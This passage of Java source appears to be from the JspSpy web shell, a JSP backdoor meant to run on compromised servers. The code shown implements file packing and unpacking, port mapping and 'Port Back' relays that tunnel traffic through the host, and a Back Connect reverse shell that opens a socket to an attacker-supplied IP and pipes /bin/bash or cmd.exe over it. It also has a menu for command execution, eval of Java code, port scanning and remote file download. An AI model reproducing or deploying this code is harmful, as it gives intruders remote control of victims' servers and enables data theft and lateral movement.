2817. public boolean doBefore() {
2818. return false;
2819. }
2820.  
2821. public boolean doAfter() {
2822. return false;
2823. }
2824.  
2825. private boolean config = false;
2826. private String extFilter = "blacklist";
2827. private String[] fileExts = null;
2828. private String sizeFilter = "no";
2829. private int filesize = 0;
2830. private String[] exclude = null;
2831. private String packFile = null;
2832.  
2833. private void reset() {
2834. this.config = false;
2835. this.extFilter = "blacklist";
2836. this.fileExts = null;
2837. this.sizeFilter = "no";
2838. this.filesize = 0;
2839. this.exclude = null;
2840. this.packFile = null;
2841. }
2842.  
2843. public void invoke(HttpServletRequest request,
2844. HttpServletResponse response, HttpSession JSession)
2845. throws Exception {
2846. try {
2847. String config = request.getParameter("config");
2848. if (!Util.isEmpty(config) && config.equals("true")) {
2849. this.config = true;
2850. this.extFilter = request.getParameter("extfilter");
2851. this.fileExts = request.getParameter("fileext").split(",");
2852. this.sizeFilter = request.getParameter("sizefilter");
2853. this.filesize = Integer.parseInt(request
2854. .getParameter("filesize"));
2855. this.exclude = request.getParameter("exclude").split(",");
2856. }
2857. String packedFile = request.getParameter("packedfile");
2858. if (Util.isEmpty(packedFile))
2859. return;
2860. this.packFile = packedFile;
2861. String saveFileName = request.getParameter("savefilename");
2862. File saveF = null;
2863. if (this.config)
2864. saveF = new File(saveFileName);
2865. else
2866. saveF = new File(JSession.getAttribute(CURRENT_DIR)
2867. .toString(), saveFileName);
2868. if (saveF.exists()) {
2869. JSession.setAttribute(MSG, "The File \"" + saveFileName
2870. + "\" Has Been Exists!");
2871. response.sendRedirect(SHELL_NAME);
2872. return;
2873. }
2874. File pF = new File(packedFile);
2875. ZipOutputStream zout = null;
2876. String base = "";
2877. if (pF.isDirectory()) {
2878. if (pF.listFiles().length == 0) {
2879. JSession
2880. .setAttribute(MSG,
2881. "No File To Pack ! Maybe The Directory Is Empty .");
2882. response.sendRedirect(SHELL_NAME);
2883. this.reset();
2884. return;
2885. }
2886. zout = new ZipOutputStream(new BufferedOutputStream(
2887. new FileOutputStream(saveF)));
2888. zipDir(pF, base, zout);
2889. } else {
2890. zout = new ZipOutputStream(new BufferedOutputStream(
2891. new FileOutputStream(saveF)));
2892. zipFile(pF, base, zout);
2893. }
2894. zout.close();
2895. this.reset();
2896. JSession.setAttribute(MSG, "Pack File Success!");
2897. response.sendRedirect(SHELL_NAME);
2898. } catch (Exception e) {
2899. throw e;
2900. }
2901. }
2902.  
2903. public void zipDir(File f, String base, ZipOutputStream zout)
2904. throws Exception {
2905. if (f.isDirectory()) {
2906. if (this.config) {
2907. String curName = f.getAbsolutePath().replace('\\', '/');
2908. curName = curName.replaceAll("\\Q" + this.packFile + "\\E",
2909. "");
2910. if (this.exclude != null) {
2911. for (int i = 0; i < exclude.length; i++) {
2912. if (!Util.isEmpty(exclude[i])
2913. && curName.startsWith(exclude[i])) {
2914. return;
2915. }
2916. }
2917. }
2918. }
2919. File[] arr = f.listFiles();
2920. for (int i = 0; i < arr.length; i++) {
2921. File ff = arr[i];
2922. String tmpBase = base;
2923. if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/"))
2924. tmpBase += "/";
2925. zipDir(ff, tmpBase + f.getName(), zout);
2926. }
2927. } else {
2928. String tmpBase = base;
2929. if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/"))
2930. tmpBase += "/";
2931. zipFile(f, tmpBase, zout);
2932. }
2933.  
2934. }
2935.  
2936. public void zipFile(File f, String base, ZipOutputStream zout)
2937. throws Exception {
2938. if (this.config) {
2939. String ext = f.getName().substring(
2940. f.getName().lastIndexOf('.') + 1);
2941. if (this.extFilter.equals("blacklist")) {
2942. if (Util.exists(this.fileExts, ext)) {
2943. return;
2944. }
2945. } else if (this.extFilter.equals("whitelist")) {
2946. if (!Util.exists(this.fileExts, ext)) {
2947. return;
2948. }
2949. }
2950. if (!this.sizeFilter.equals("no")) {
2951. double size = f.length() / 1024;
2952. if (this.sizeFilter.equals("greaterthan")) {
2953. if (size < filesize)
2954. return;
2955. } else if (this.sizeFilter.equals("lessthan")) {
2956. if (size > filesize)
2957. return;
2958. }
2959. }
2960. }
2961. ZipEntry entry = new ZipEntry(base + f.getName());
2962. zout.putNextEntry(entry);
2963. FileInputStream fInput = new FileInputStream(f);
2964. int len = 0;
2965. byte[] buf = new byte[1024];
2966. while ((len = fInput.read(buf)) != -1) {
2967. zout.write(buf, 0, len);
2968. zout.flush();
2969. }
2970. fInput.close();
2971. }
2972. }
2973.  
2974. private static class UnPackInvoker extends DefaultInvoker {
2975. public boolean doBefore() {
2976. return false;
2977. }
2978.  
2979. public boolean doAfter() {
2980. return false;
2981. }
2982.  
2983. public void invoke(HttpServletRequest request,
2984. HttpServletResponse response, HttpSession JSession)
2985. throws Exception {
2986. try {
2987. String savepath = request.getParameter("savepath");
2988. String zipfile = request.getParameter("zipfile");
2989. if (Util.isEmpty(savepath) || Util.isEmpty(zipfile))
2990. return;
2991. File save = new File(savepath);
2992. save.mkdirs();
2993. ZipFile file = new ZipFile(new File(zipfile));
2994. Enumeration e = file.entries();
2995. while (e.hasMoreElements()) {
2996. ZipEntry en = (ZipEntry) e.nextElement();
2997. String entryPath = en.getName();
2998. int index = entryPath.lastIndexOf("/");
2999. if (index != -1)
3000. entryPath = entryPath.substring(0, index);
3001. File absEntryFile = new File(save, entryPath);
3002. if (!absEntryFile.exists()
3003. && (en.isDirectory() || en.getName().indexOf("/") != -1))
3004. absEntryFile.mkdirs();
3005. BufferedOutputStream output = null;
3006. BufferedInputStream input = null;
3007. try {
3008. output = new BufferedOutputStream(new FileOutputStream(
3009. new File(save, en.getName())));
3010. input = new BufferedInputStream(file.getInputStream(en));
3011. byte[] b = new byte[1024];
3012. int len = input.read(b);
3013. while (len != -1) {
3014. output.write(b, 0, len);
3015. len = input.read(b);
3016. }
3017. } catch (Exception ex) {
3018. } finally {
3019. try {
3020. if (output != null)
3021. output.close();
3022. if (input != null)
3023. input.close();
3024. } catch (Exception ex1) {
3025. }
3026. }
3027. }
3028. file.close();
3029. JSession.setAttribute(MSG, "UnPack File Success!");
3030. response.sendRedirect(SHELL_NAME);
3031. } catch (Exception e) {
3032.  
3033. throw e;
3034. }
3035. }
3036. }
3037.  
3038. //VMapPort
3039. private static class VmpInvoker extends DefaultInvoker {
3040. public void invoke(HttpServletRequest request,
3041. HttpServletResponse response, HttpSession JSession)
3042. throws Exception {
3043. try {
3044. PrintWriter out = response.getWriter();
3045. Object localIP = JSession.getAttribute("localIP");
3046. Object localPort = JSession.getAttribute("localPort");
3047. Object remoteIP = JSession.getAttribute("remoteIP");
3048. Object remotePort = JSession.getAttribute("remotePort");
3049. Object done = JSession.getAttribute("done");
3050.  
3051. JSession.removeAttribute("localIP");
3052. JSession.removeAttribute("localPort");
3053. JSession.removeAttribute("remoteIP");
3054. JSession.removeAttribute("remotePort");
3055. JSession.removeAttribute("done");
3056.  
3057. if (Util.isEmpty(localIP))
3058. localIP = InetAddress.getLocalHost().getHostAddress();
3059. if (Util.isEmpty(localPort))
3060. localPort = "3389";
3061. if (Util.isEmpty(remoteIP))
3062. remoteIP = "www.baidu.com";
3063. if (Util.isEmpty(remotePort))
3064. remotePort = "80";
3065. if (!Util.isEmpty(done))
3066. Util.outMsg(out, done.toString());
3067.  
3068. out
3069. .println("<form action=\""
3070. + SHELL_NAME
3071. + "\" method=\"post\">"
3072. + "<input type=\"hidden\" name=\"o\" value=\"mapPort\">"
3073. + " <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3074. + " <tr>"
3075. + " <td><h2 id=\"Bin_H2_Title\">PortMap &gt;&gt;<hr/></h2>"
3076. + " <div id=\"hOWTm\">"
3077. + " <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"
3078. + " <tr align=\"center\">"
3079. + " <td style=\"width:5%\"></td>"
3080. + " <td style=\"width:20%\" align=\"left\"><br/>Local Ip :"
3081. + " <input name=\"localIP\" id=\"localIP\" type=\"text\" class=\"input\" size=\"20\" value=\""
3082. + localIP
3083. + "\" />"
3084. + " </td>"
3085. + " <td style=\"width:20%\" align=\"left\">Local Port :"
3086. + " <input name=\"localPort\" id=\"localPort\" type=\"text\" class=\"input\" size=\"20\" value=\""
3087. + localPort
3088. + "\" /></td>"
3089. + " <td style=\"width:20%\" align=\"left\">Remote Ip :"
3090. + " <input name=\"remoteIP\" id=\"remoteIP\" type=\"text\" class=\"input\" size=\"20\" value=\""
3091. + remoteIP
3092. + "\" /></td>"
3093. + " <td style=\"width:20%\" align=\"left\">Remote Port :"
3094. + " <input name=\"remotePort\" id=\"remotePort\" type=\"text\" class=\"input\" size=\"20\" value=\""
3095. + remotePort
3096. + "\" /></td>"
3097. + " </tr>"
3098. + " <tr align=\"center\">"
3099. + " <td colspan=\"5\"><br/>"
3100. + " <input type=\"submit\" name=\"FJE\" value=\"MapPort\" id=\"FJE\" class=\"bt\" />"
3101. + " <input type=\"button\" name=\"giX\" value=\"ClearAll\" id=\"giX\" onClick=\"location.href='"
3102. + SHELL_NAME + "?o=smp'\" class=\"bt\" />"
3103. + " </td>" + " </tr>" + " </table>"
3104. + " </div>" + "</td>" + "</tr>" + "</table>"
3105. + "</form>");
3106. String targetIP = request.getParameter("targetIP");
3107. String targetPort = request.getParameter("targetPort");
3108. String yourIP = request.getParameter("yourIP");
3109. String yourPort = request.getParameter("yourPort");
3110. if (Util.isEmpty(targetIP))
3111. targetIP = "127.0.0.1";
3112. if (Util.isEmpty(targetPort))
3113. targetPort = "3389";
3114. if (Util.isEmpty(yourIP))
3115. yourIP = request.getRemoteAddr();
3116. if (Util.isEmpty(yourPort))
3117. yourPort = "53";
3118. out
3119. .println("<form action=\""
3120. + SHELL_NAME
3121. + "\" method=\"post\">"
3122. + "<input type=\"hidden\" name=\"o\" value=\"portBack\">"
3123. + " <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3124. + " <tr>"
3125. + " <td><h2 id=\"Bin_H2_Title\">Port Back &gt;&gt;<hr/></h2>"
3126. + " <div id=\"hOWTm\">"
3127. + " <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"
3128. + " <tr align=\"center\">"
3129. + " <td style=\"width:5%\"></td>"
3130. + " <td style=\"width:20%\" align=\"left\"><br/>Target Ip :"
3131. + " <input name=\"targetIP\" id=\"targetIP\" type=\"text\" class=\"input\" size=\"20\" value=\""
3132. + targetIP
3133. + "\" />"
3134. + " </td>"
3135. + " <td style=\"width:20%\" align=\"left\">Target Port :"
3136. + " <input name=\"targetPort\" id=\"targetPort\" type=\"text\" class=\"input\" size=\"20\" value=\""
3137. + targetPort
3138. + "\" /></td>"
3139. + " <td style=\"width:20%\" align=\"left\">Your Ip :"
3140. + " <input name=\"yourIP\" id=\"yourIP\" type=\"text\" class=\"input\" size=\"20\" value=\""
3141. + yourIP
3142. + "\" /></td>"
3143. + " <td style=\"width:20%\" align=\"left\">Your Port :"
3144. + " <input name=\"yourPort\" id=\"yourPort\" type=\"text\" class=\"input\" size=\"20\" value=\""
3145. + yourPort
3146. + "\" /></td>"
3147. + " </tr>"
3148. + " <tr align=\"center\">"
3149. + " <td colspan=\"5\"><br/>"
3150. + " <input type=\"submit\" name=\"FJE\" value=\"Port Back\" id=\"FJE\" class=\"bt\" />"
3151. + " </td>" + " </tr>" + " </table>"
3152. + " </div>" + "</td>" + "</tr>" + "</table>"
3153. + "</form>");
3154. } catch (Exception e) {
3155.  
3156. throw e;
3157. }
3158. }
3159. }
3160.  
3161. //StopMapPort
3162. private static class SmpInvoker extends DefaultInvoker {
3163. public boolean doAfter() {
3164. return true;
3165. }
3166.  
3167. public boolean doBefore() {
3168. return true;
3169. }
3170.  
3171. public void invoke(HttpServletRequest request,
3172. HttpServletResponse response, HttpSession JSession)
3173. throws Exception {
3174. try {
3175. Object obj = JSession.getAttribute(PORT_MAP);
3176. if (obj != null) {
3177. ServerSocket server = (ServerSocket) JSession
3178. .getAttribute(PORT_MAP);
3179. server.close();
3180. }
3181. JSession.setAttribute("done", "Stop Success!");
3182. ((Invoker) ins.get("vmp")).invoke(request, response, JSession);
3183. } catch (Exception e) {
3184.  
3185. throw e;
3186. }
3187. }
3188. }
3189.  
3190. //PortBack
3191. private static class PortBackInvoker extends DefaultInvoker {
3192. public boolean doAfter() {
3193. return true;
3194. }
3195.  
3196. public boolean doBefore() {
3197. return true;
3198. }
3199.  
3200. public void invoke(HttpServletRequest request,
3201. HttpServletResponse response, HttpSession JSession)
3202. throws Exception {
3203. try {
3204. String targetIP = request.getParameter("targetIP");
3205. String targetPort = request.getParameter("targetPort");
3206. String yourIP = request.getParameter("yourIP");
3207. String yourPort = request.getParameter("yourPort");
3208. Socket yourS = new Socket();
3209. yourS.connect(new InetSocketAddress(yourIP, Integer
3210. .parseInt(yourPort)));
3211. Socket targetS = new Socket();
3212. targetS.connect(new InetSocketAddress(targetIP, Integer
3213. .parseInt(targetPort)));
3214. StreamConnector.readFromLocal(new DataInputStream(targetS
3215. .getInputStream()), new DataOutputStream(yourS
3216. .getOutputStream()));
3217. StreamConnector.readFromRemote(targetS, yourS,
3218. new DataInputStream(yourS.getInputStream()),
3219. new DataOutputStream(targetS.getOutputStream()));
3220. JSession.setAttribute("done", "Port Back Success !");
3221. ((Invoker) ins.get("vmp")).invoke(request, response, JSession);
3222. } catch (Exception e) {
3223.  
3224. throw e;
3225. }
3226. }
3227. }
3228.  
3229. private static class MapPortInvoker extends DefaultInvoker {
3230. public boolean doBefore() {
3231. return false;
3232. }
3233.  
3234. public boolean doAfter() {
3235. return false;
3236. }
3237.  
3238. public void invoke(HttpServletRequest request,
3239. HttpServletResponse response, HttpSession JSession)
3240. throws Exception {
3241. try {
3242. PrintWriter out = response.getWriter();
3243. String localIP = request.getParameter("localIP");
3244. String localPort = request.getParameter("localPort");
3245. final String remoteIP = request.getParameter("remoteIP");
3246. final String remotePort = request.getParameter("remotePort");
3247. if (Util.isEmpty(localIP) || Util.isEmpty(localPort)
3248. || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort))
3249. return;
3250. Object obj = JSession.getAttribute(PORT_MAP);
3251. if (obj != null) {
3252. ServerSocket s = (ServerSocket) obj;
3253. s.close();
3254. }
3255. final ServerSocket server = new ServerSocket();
3256. server.bind(new InetSocketAddress(localIP, Integer
3257. .parseInt(localPort)));
3258. JSession.setAttribute(PORT_MAP, server);
3259. new Thread(new Runnable() {
3260. public void run() {
3261. while (true) {
3262. Socket soc = null;
3263. Socket remoteSoc = null;
3264. DataInputStream remoteIn = null;
3265. DataOutputStream remoteOut = null;
3266. DataInputStream localIn = null;
3267. DataOutputStream localOut = null;
3268. try {
3269. soc = server.accept();
3270. remoteSoc = new Socket();
3271. remoteSoc
3272. .connect(new InetSocketAddress(
3273. remoteIP, Integer
3274. .parseInt(remotePort)));
3275. remoteIn = new DataInputStream(remoteSoc
3276. .getInputStream());
3277. remoteOut = new DataOutputStream(remoteSoc
3278. .getOutputStream());
3279. localIn = new DataInputStream(soc
3280. .getInputStream());
3281. localOut = new DataOutputStream(soc
3282. .getOutputStream());
3283. StreamConnector.readFromLocal(localIn,
3284. remoteOut);
3285. StreamConnector.readFromRemote(soc, remoteSoc,
3286. remoteIn, localOut);
3287. } catch (Exception ex) {
3288. break;
3289. }
3290. }
3291. }
3292.  
3293. }).start();
3294. JSession.setAttribute("done", "Map Port Success!");
3295. JSession.setAttribute("localIP", localIP);
3296. JSession.setAttribute("localPort", localPort);
3297. JSession.setAttribute("remoteIP", remoteIP);
3298. JSession.setAttribute("remotePort", remotePort);
3299. JSession.setAttribute(SESSION_O, "vmp");
3300. response.sendRedirect(SHELL_NAME);
3301. } catch (Exception e) {
3302.  
3303. throw e;
3304. }
3305. }
3306. }
3307.  
3308. //VBackConnect
3309. private static class VbcInvoker extends DefaultInvoker {
3310. public void invoke(HttpServletRequest request,
3311. HttpServletResponse response, HttpSession JSession)
3312. throws Exception {
3313. try {
3314. PrintWriter out = response.getWriter();
3315. Object ip = JSession.getAttribute("ip");
3316. Object port = JSession.getAttribute("port");
3317. Object program = JSession.getAttribute("program");
3318. Object done = JSession.getAttribute("done");
3319. JSession.removeAttribute("ip");
3320. JSession.removeAttribute("port");
3321. JSession.removeAttribute("program");
3322. JSession.removeAttribute("done");
3323. if (Util.isEmpty(ip))
3324. ip = request.getRemoteAddr();
3325. if (Util.isEmpty(port) || !Util.isInteger(port.toString()))
3326. port = "53";
3327. if (Util.isEmpty(program)) {
3328. if (ISLINUX)
3329. program = "/bin/bash";
3330. else
3331. program = "cmd.exe";
3332. }
3333.  
3334. if (!Util.isEmpty(done))
3335. Util.outMsg(out, done.toString());
3336. out
3337. .println("<form action=\""
3338. + SHELL_NAME
3339. + "\" method=\"post\">"
3340. + "<input type=\"hidden\" name=\"o\" value=\"backConnect\">"
3341. + " <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3342. + " <tr>"
3343. + " <td><h2 id=\"Bin_H2_Title\">Back Connect &gt;&gt;</h2>"
3344. + " <div id=\"hOWTm\">"
3345. + " <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"
3346. + " <tr align=\"center\">"
3347. + " <td style=\"width:5%\"></td>"
3348. + " <td align=\"center\">Your Ip :"
3349. + " <input name=\"ip\" id=\"ip\" type=\"text\" class=\"input\" size=\"20\" value=\""
3350. + ip
3351. + "\" />"
3352. + " Your Port :"
3353. + " <input name=\"port\" id=\"port\" type=\"text\" class=\"input\" size=\"20\" value=\""
3354. + port
3355. + "\" />Program To Back :"
3356. + " <input name=\"program\" id=\"program\" type=\"text\" value=\""
3357. + program
3358. + "\" class=\"input\" size=\"20\" value=\"d\" /></td>"
3359. + " </tr>"
3360. + " <tr align=\"center\">"
3361. + " <td colspan=\"2\"><br/>"
3362. + " <input type=\"submit\" name=\"FJE\" value=\"Connect\" id=\"FJE\" class=\"bt\" />"
3363. + " </td>" + " </tr>" + " </table>"
3364. + " </div>" + "</td>" + "</tr>" + "</table>"
3365. + "</form>");
3366. } catch (Exception e) {
3367.  
3368. throw e;
3369. }
3370. }
3371. }
3372.  
3373. private static class BackConnectInvoker extends DefaultInvoker {
3374. public boolean doAfter() {
3375. return false;
3376. }
3377.  
3378. public boolean doBefore() {
3379. return false;
3380. }
3381.  
3382. public void invoke(HttpServletRequest request,
3383. HttpServletResponse response, HttpSession JSession)
3384. throws Exception {
3385. try {
3386. String ip = request.getParameter("ip");
3387. String port = request.getParameter("port");
3388. String program = request.getParameter("program");
3389. if (Util.isEmpty(ip) || Util.isEmpty(program)
3390. || !Util.isInteger(port))
3391. return;
3392. Socket socket = new Socket(ip, Integer.parseInt(port));
3393. Process process = Runtime.getRuntime().exec(program);
3394. (new StreamConnector(process.getInputStream(), socket
3395. .getOutputStream())).start();
3396. (new StreamConnector(process.getErrorStream(), socket
3397. .getOutputStream())).start();
3398. (new StreamConnector(socket.getInputStream(), process
3399. .getOutputStream())).start();
3400. JSession.setAttribute("done", "Back Connect Success!");
3401. JSession.setAttribute("ip", ip);
3402. JSession.setAttribute("port", port);
3403. JSession.setAttribute("program", program);
3404. JSession.setAttribute(SESSION_O, "vbc");
3405. response.sendRedirect(SHELL_NAME);
3406. } catch (Exception e) {
3407.  
3408. throw e;
3409. }
3410. }
3411. }
3412.  
3413. private static class JspEnvInvoker extends DefaultInvoker {
3414. public void invoke(HttpServletRequest request,
3415. HttpServletResponse response, HttpSession JSession)
3416. throws Exception {
3417. try {
3418. PrintWriter out = response.getWriter();
3419. out
3420. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3421. + " <tr>"
3422. + " <td><h2 id=\"Ninty_H2_Title\">System Properties &gt;&gt;</h2>"
3423. + " <div id=\"ghaB\">"
3424. + " <hr/>"
3425. + " <ul id=\"Ninty_Ul_Sys\" class=\"info\">");
3426. Properties pro = System.getProperties();
3427. Enumeration names = pro.propertyNames();
3428. while (names.hasMoreElements()) {
3429. String name = (String) names.nextElement();
3430. out.println("<li><u>" + Util.htmlEncode(name) + " : </u>"
3431. + Util.htmlEncode(pro.getProperty(name)) + "</li>");
3432. }
3433. out
3434. .println("</ul><h2 id=\"Ninty_H2_Mac\">System Environment &gt;&gt;</h2><hr/><ul id=\"Ninty_Ul_Sys\" class=\"info\">");
3435. /*
3436. Map envs = System.getenv();
3437. Set<Map.Entry<String,String>> entrySet = envs.entrySet();
3438. for (Map.Entry<String,String> en:entrySet) {
3439. out.println("<li><u>"+Util.htmlEncode(en.getKey())+" : </u>"+Util.htmlEncode(en.getValue())+"</li>");
3440. }*/
3441. out
3442. .println("</ul></div></td>" + " </tr>"
3443. + " </table>");
3444. } catch (Exception e) {
3445.  
3446. throw e;
3447. }
3448. }
3449. }
3450.  
3451. private static class ReflectInvoker extends DefaultInvoker {
3452. public void invoke(HttpServletRequest request,
3453. HttpServletResponse response, HttpSession JSession)
3454. throws Exception {
3455. try {
3456. PrintWriter out = response.getWriter();
3457. String c = request.getParameter("Class");
3458. Class cls = null;
3459. try {
3460. if (!Util.isEmpty(c))
3461. cls = Class.forName(c);
3462. } catch (ClassNotFoundException ex) {
3463. Util.outMsg(out, "<span style='color:red'>Class " + c
3464. + " Not Found ! </span>");
3465. }
3466. out
3467. .println("<form action=\""
3468. + SHELL_NAME
3469. + "\" id='refForm' method=\"post\">"
3470. + " <input type=\"hidden\" name=\"o\" value=\"reflect\">"
3471. + " <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3472. + " <tr>"
3473. + " <td><h2 id=\"Bin_H2_Title\">Java Reflect &gt;&gt;</h2>"
3474. + " <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"
3475. + " <tr>"
3476. + " <td>Class Name : <input name=\"Class\" type=\"text\" class=\"input\" value=\""
3477. + (Util.isEmpty(c) ? "java.lang.Object" : c)
3478. + "\" size=\"60\"/> "
3479. + " <input type=\"submit\" class=\"bt\" value=\"Reflect\"/></td>"
3480. + " </tr>" + " "
3481. + " </table>" + " </td>"
3482. + " </tr>" + " </table>" + "</form>");
3483.  
3484. if (cls != null) {
3485. StringBuffer sb = new StringBuffer();
3486. if (cls.getPackage() != null)
3487. sb.append("package " + cls.getPackage().getName()
3488. + ";\n");
3489. String n = null;
3490. if (cls.isInterface())
3491. n = "";
3492. //else if (cls.isEnum())
3493. // n = "enum";
3494. else
3495. n = "class";
3496. sb.append(Modifier.toString(cls.getModifiers()) + " " + n
3497. + " " + cls.getName() + "\n");
3498. if (cls.getSuperclass() != null)
3499. sb
3500. .append("\textends <a href=\"javascript:document.forms['refForm'].elements['Class'].value='"
3501. + cls.getSuperclass().getName()
3502. + "';document.forms['refForm'].submit()\" style='color:red;'>"
3503. + cls.getSuperclass().getName()
3504. + "</a>\n");
3505. if (cls.getInterfaces() != null
3506. && cls.getInterfaces().length != 0) {
3507. Class[] faces = cls.getInterfaces();
3508. sb.append("\t implements ");
3509. for (int i = 0; i < faces.length; i++) {
3510. sb
3511. .append("<a href=\"javascript:document.forms['refForm'].elements['Class'].value='"
3512. + faces[i].getName()
3513. + "';document.forms['refForm'].submit()\" style='color:red'>"
3514. + faces[i].getName() + "</a>");
3515. if (i != faces.length - 1) {
3516. sb.append(",");
3517. }
3518. }
3519. }
3520. sb.append("{\n\t\n");
3521. sb.append("\t//constructors..\n");
3522. Constructor[] cs = cls.getConstructors();
3523. for (int i = 0; i < cs.length; i++) {
3524. Constructor cc = cs[i];
3525. sb.append("\t" + cc + ";\n");
3526. }
3527. sb.append("\n\t//fields\n");
3528. Field[] fs = cls.getDeclaredFields();
3529. for (int i = 0; i < fs.length; i++) {
3530. Field f = fs[i];
3531. sb.append("\t" + f.toString() + ";");
3532. if (Modifier.toString(f.getModifiers()).indexOf(
3533. "static") != -1) {
3534. sb.append("\t//value is : ");
3535. f.setAccessible(true);
3536. Object obj = f.get(null);
3537. sb.append("<span style='color:red'>");
3538. if (obj != null)
3539. sb.append(obj.toString());
3540. else
3541. sb.append("NULL");
3542.  
3543. sb.append("</span>");
3544. }
3545. sb.append("\n");
3546. }
3547.  
3548. sb.append("\n\t//methods\n");
3549. Method[] ms = cls.getDeclaredMethods();
3550. for (int i = 0; i < ms.length; i++) {
3551. Method m = ms[i];
3552. sb.append("\t" + m.toString() + ";\n");
3553. }
3554. sb.append("}\n");
3555. String m = "<span style='font-weight:normal'>"
3556. + Util.highLight(sb.toString()).replaceAll("\t",
3557. "&nbsp;&nbsp;&nbsp;&nbsp;").replaceAll(
3558. "\n", "<br/>") + "</span>";
3559. Util.outMsg(out, m, "left");
3560. }
3561. } catch (Exception e) {
3562. throw e;
3563. }
3564. }
3565. }
3566.  
3567. private static class TopInvoker extends DefaultInvoker {
3568. public void invoke(HttpServletRequest request,
3569. HttpServletResponse response, HttpSession JSession)
3570. throws Exception {
3571. try {
3572. PrintWriter out = response.getWriter();
3573. out
3574. .println("<form action=\""
3575. + SHELL_NAME
3576. + "\" method=\"post\" name=\"doForm\"></form>"
3577. + "<table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">"
3578. + " <tr class=\"head\">"
3579. + " <td><span style=\"float:right;\">JspSpy Ver: 2010</span>"
3580. + request.getHeader("host")
3581. + " (<span id='ip'>"
3582. + InetAddress.getLocalHost().getHostAddress()
3583. + "</span>) | <a href=\"javascript:if (!window.clipboardData){alert('only support IE!');}else{void(window.clipboardData.setData('Text', document.getElementById('ip').innerText));alert('ok')}\">copy</a></td>"
3584. + " </tr>"
3585. + " <tr class=\"alt1\">"
3586. + " <td><a href=\"javascript:doPost({o:'logout'});\">Logout</a> | "
3587. + " <a href=\"javascript:doPost({o:'fileList'});\">File Manager</a> | "
3588. + " <a href=\"javascript:doPost({o:'vConn'});\">DataBase Manager</a> | "
3589. + " <a href=\"javascript:doPost({o:'vs'});\">Execute Command</a> | "
3590. + " <a href=\"javascript:doPost({o:'vso'});\">Shell OnLine</a> | "
3591. + " <a href=\"javascript:doPost({o:'vbc'});\">Back Connect</a> | "
3592. + " <a href=\"javascript:doPost({o:'reflect'});\">Java Reflect</a> | "
3593. + " <!--<a href=\"javascript:alert('not support yet');\">Http Proxy</a> | -->"
3594. + " <a href=\"javascript:doPost({o:'ev'});\">Eval Java Code</a> | "
3595. + " <a href=\"javascript:doPost({o:'vPortScan'});;\">Port Scan</a> | "
3596. + " <a href=\"javascript:doPost({o:'vd'});\">Download Remote File</a> | "
3597. + " <a href=\"javascript:;doPost({o:'clipboard'});\">ClipBoard</a> | "
3598. + " <a href=\"javascript:doPost({o:'vmp'});\">Port Map</a> | "
3599. + " <a href=\"javascript:doPost({o:'vother'});\">Others</a> | "
3600. + " <a href=\"javascript:doPost({o:'jspEnv'});\">JSP Env</a> "
3601. + " </tr>" + "</table>");
3602. if (JSession.getAttribute(MSG) != null) {
3603. Util.outMsg(out, JSession.getAttribute(MSG).toString());
3604. JSession.removeAttribute(MSG);
3605. }
3606. if (JSession.getAttribute(ENTER_MSG) != null) {
3607. String outEntry = request.getParameter("outentry");
3608. if (Util.isEmpty(outEntry) || !outEntry.equals("true"))
3609. Util.outMsg(out, JSession.getAttribute(ENTER_MSG)
3610. .toString());
3611. }
3612. } catch (Exception e) {
3613.  
3614. throw e;
3615. }
3616. }
3617. }
3618.  
3619. private static class VOnLineShellInvoker extends DefaultInvoker {
3620. public void invoke(HttpServletRequest request,
3621. HttpServletResponse response, HttpSession JSession)
3622. throws Exception {
3623. try {
3624. PrintWriter out = response.getWriter();
3625. out
3626. .println("<script>"
3627. + " function $(id) {"
3628. + " return document.getElementById(id);"
3629. + " }"
3630. + " var ie = window.navigator.userAgent.toLowerCase().indexOf(\"msie\") != -1;"
3631. + " window.onload = function(){"
3632. + " setInterval(function(){"
3633. + " if ($(\"autoscroll\").checked)"
3634. + " {"
3635. + " var f = window.frames[\"echo\"];"
3636. + " if (f && f.document && f.document.body)"
3637. + " {"
3638. + " if (!ie)"
3639. + " {"
3640. + " if (f.document.body.offsetHeight)"
3641. + " {"
3642. + " f.scrollTo(0,parseInt(f.document.body.offsetHeight)+1);"
3643. + " }"
3644. + " } else {"
3645. + " f.scrollTo(0,parseInt(f.document.body.scrollHeight)+1);"
3646. + " }" + " }" + " }"
3647. + " },500);" + " }" + " </script>");
3648. out
3649. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3650. + " <tr>" + " <td>");
3651. out.println("<h2>Shell OnLine &raquo;</h2><br/>");
3652. out
3653. .println("<form action=\""
3654. + SHELL_NAME
3655. + "\" method=\"post\" target=\"echo\" onsubmit=\"$('cmd').focus()\">"
3656. + " <input type=\"submit\" value=\" start \" class=\"bt\">"
3657. + " <input type=\"text\" name=\"exe\" style=\"width:300px\" class=\"input\" value=\""
3658. + (ISLINUX ? "/bin/bash"
3659. : "c:\\windows\\system32\\cmd.exe")
3660. + "\"/>"
3661. + " <input type=\"hidden\" name=\"o\" value=\"online\"/><input type=\"hidden\" name=\"type\" value=\"start\"/><span class=\"tip\">Notice ! If You Are Using IE , You Must Input Some Commands First After You Start Or You Will Not See The Echo</span>"
3662. + " </form>"
3663. + " <hr/>"
3664. + " <iframe class=\"secho\" name=\"echo\" src=\"\">"
3665. + " </iframe>"
3666. + " <form action=\""
3667. + SHELL_NAME
3668. + "\" method=\"post\" onsubmit=\"this.submit();$('cmd').value='';return false;\" target=\"asyn\">"
3669. + " <input type=\"text\" id=\"cmd\" name=\"cmd\" class=\"input\" style=\"width:75%\">"
